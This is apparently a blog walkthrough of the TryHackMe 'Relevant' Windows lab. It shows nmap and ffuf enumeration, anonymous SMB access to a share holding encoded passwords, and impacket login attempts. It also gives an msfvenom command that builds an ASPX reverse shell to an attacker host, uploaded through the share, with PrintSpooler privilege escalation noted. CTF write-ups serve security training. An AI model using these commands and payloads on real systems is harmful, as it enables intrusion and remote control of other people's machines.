BLOG

Relevant[Tryhackme]

Jul 11, 2021 | 8 minutes read
Share this:

Categories: walkthrough

Tags: tryhackme, thm, smb, samba, impacket, CVE-2021-34527, Windows-Machine, PrivEsc, PrivEsc-Windows, PrivEsc-Printspooler, printspooler

Relevant Walkthrough

$ nmap -p1-65535 10.10.2.212 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 00:48 IST
Initiating Ping Scan at 00:48
Scanning 10.10.2.212 [2 ports]
Completed Ping Scan at 00:48, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:48
Completed Parallel DNS resolution of 1 host. at 00:48, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 00:48
Scanning 10.10.2.212 [8 ports]
Discovered open port 445/tcp on 10.10.2.212
Discovered open port 49663/tcp on 10.10.2.212
Discovered open port 49667/tcp on 10.10.2.212
Discovered open port 49669/tcp on 10.10.2.212
Discovered open port 80/tcp on 10.10.2.212
Discovered open port 3389/tcp on 10.10.2.212
Discovered open port 135/tcp on 10.10.2.212
Discovered open port 139/tcp on 10.10.2.212
Completed Connect Scan at 00:48, 0.36s elapsed (8 total ports)
Nmap scan report for 10.10.2.212
Host is up, received syn-ack (0.36s latency).
Scanned at 2021-07-09 00:48:25 IST for 7s

PORT      STATE SERVICE       REASON
80/tcp    open  http          syn-ack
135/tcp   open  msrpc         syn-ack
139/tcp   open  netbios-ssn   syn-ack
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
49663/tcp open  unknown       syn-ack
49667/tcp open  unknown       syn-ack
49669/tcp open  unknown       syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds

$ nmap -sV -sC -p80,135,139,445,3389,49667,49669,49663 10.10.2.212                                   Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 00:50 IST
Nmap scan report for 10.10.2.212
Host is up (0.36s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2021-07-08T19:21:29+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-07-07T18:52:30
|_Not valid after:  2022-01-06T18:52:30
|_ssl-date: 2021-07-08T19:22:09+00:00; -1s from scanner time.
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m52s, median: -1s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-08T12:21:32-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-08T19:21:29
|_  start_date: 2021-07-08T18:52:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.54 seconds

80/tcp open http Microsoft IIS httpd 10.0 49663/tcp open http Microsoft IIS httpd 10.0

Enumerating Port 80

homeporteighty.png

Nothing much on Default Page.

Let’s fuzz it

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.2.212/FUZZ -e .php,.asp,.aspx,.html,.txt -ic -t 250

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.2.212/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .asp .aspx .html .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 703, Words: 27, Lines: 32]
:: Progress: [1323282/1323282] :: Job [1/1] :: 175 req/sec :: Duration: [0:08:25] :: Errors: 0 ::

Nothing much available in webserver hosted on port 80

Enumerating port 49663

home.png

There is nothing much on Default page.

Let’s Fuzz it


$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.2.212:49663/FUZZ -e .html,.asp,.aspx,.php,.txt -ic -t 250

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.2.212:49663/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .html .asp .aspx .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 703, Words: 27, Lines: 32]
nt4wrksv                [Status: 301, Size: 157, Words: 9, Lines: 2]
:: Progress: [1323282/1323282] :: Job [1/1] :: 106 req/sec :: Duration: [0:06:20] :: Errors: 0 ::

By fuzzing, we got a directory nt4wrksv

Let’s check what’s on nt4wrksv

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.2.212:49663/nt4wrksv/FUZZ -e .html,.asp,.aspx,.php,.txt -ic -t 250

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.2.212:49663/nt4wrksv/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .html .asp .aspx .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 0, Words: 1, Lines: 1]
passwords.txt           [Status: 200, Size: 98, Words: 4, Lines: 3]
Passwords.txt           [Status: 200, Size: 98, Words: 4, Lines: 3]
: Progress: [1323282/1323282] :: Job [1/1] :: 205 req/sec :: Duration: [0:10:30] :: Errors: 0 ::

Navigating to the passwords.txt

passwords.png

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds

Enumerating SMB

Checking shares on Smb

$ smbclient -L  \\\\10.10.2.212\\ -U anonymous
Enter WORKGROUP\anonymous's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk
SMB1 disabled -- no workgroup available

we got the same directory as in web service

Let’s check directory contents

$ smbclient \\\\10.10.2.212\\nt4wrksv -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:16:04 2020
  ..                                  D        0  Sun Jul 26 03:16:04 2020
  passwords.txt                       A       98  Sat Jul 25 20:45:33 2020

                7735807 blocks of size 4096. 4933716 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>

$ cat passwords.txt
[User Passwords - Encoded]
                                                         
$ echo "Hash" | base64 -d

From the ouputs, we can conclude that, Samba and Webservice were sharing same directory for file hosting.

Lets try to login using the credentials we obtained

$ impacket-psexec [email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.2.212.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[*] Found writable share nt4wrksv
[*] Uploading file EanxqaXl.exe
[*] Opening SVCManager on 10.10.2.212.....
[-] Error opening SVCManager on 10.10.2.212.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager

$ impacket-psexec [email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] Authenticated as Guest. Aborting

$ impacket-smbexec [email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

3389/tcp open ms-wbt-server Microsoft Terminal Services

No Juicy Information on RDP

135/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC

Enumerating RPC

$ impacket-rpcdump -p 135 10.10.2.212
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Retrieving endpoint list from 10.10.2.212
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
          ncacn_ip_tcp:10.10.212.183[49664]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\RELEVANT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc056B40]

Protocol: N/A
Provider: winlogon.exe
UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0
Bindings:
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\RELEVANT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc056B40]
          ncalrpc:[WMsgKRpc056F61]

Protocol: N/A
Provider: N/A
UUID    : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0
Bindings:
          ncalrpc:[LRPC-1be762d5015219c5a3]
          ncalrpc:[dabrpc]
          ncalrpc:[csebpub]
          ncalrpc:[LRPC-c203dfa22bac15b3c5]
          ncalrpc:[LRPC-b82439b7ffcc5fe731]
          ncalrpc:[LRPC-9efce308fe57bc6b90]
          ncalrpc:[OLE6137AF4DDCF580E592E6DFEF2038]
          ncacn_np:\\RELEVANT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-c0a61cdf71ff711a8d]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]

Protocol: N/A
Provider: N/A
UUID    : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0
Bindings:
          ncalrpc:[csebpub]
          ncalrpc:[LRPC-c203dfa22bac15b3c5]
          ncalrpc:[LRPC-b82439b7ffcc5fe731]
          ncalrpc:[LRPC-9efce308fe57bc6b90]
          ncalrpc:[OLE6137AF4DDCF580E592E6DFEF2038]
          ncacn_np:\\RELEVANT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-c0a61cdf71ff711a8d]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-b82439b7ffcc5fe731]
          ncalrpc:[LRPC-9efce308fe57bc6b90]
          ncalrpc:[OLE6137AF4DDCF580E592E6DFEF2038]
          ncacn_np:\\RELEVANT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-c0a61cdf71ff711a8d]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-a1ffce8405a84ea78c]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.212.183[49666]
          ncacn_np:\\RELEVANT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-182ae2af32da286b69]
          ncalrpc:[LRPC-9bb267989261789578]
[...snip...]

$ impacket-dcomexec -object MMC20 [email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied

From the Enumeration phase, we have same directory for samba and webserver.

Lets create payload and host it on the samba share and request it using webserver

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=9898 --platform windows -a x64 -f aspx -o shell.aspx
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3428 bytes
Saved as: shell.aspx

$ smbclient \\\\10.10.2.212\\nt4wrksv -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (6.6 kb/s) (average 6.6 kb/s)
smb: \> exit

Getting the Shell

shellget.png

Knowing systeminfo

systeminfo.png

Obtaining User flag

usertxt.png

Checking Privileges

privs.png

There is se-impersonate privilege to escalate

In older version we have potato attacks to get system shell.

In windows 2016, We can use Printspooler attack.

Payload PrintSpooler

authority.png

Getting Root flag

roottxt

Clean up

cleanupone

cleanuptwo

cleanupthree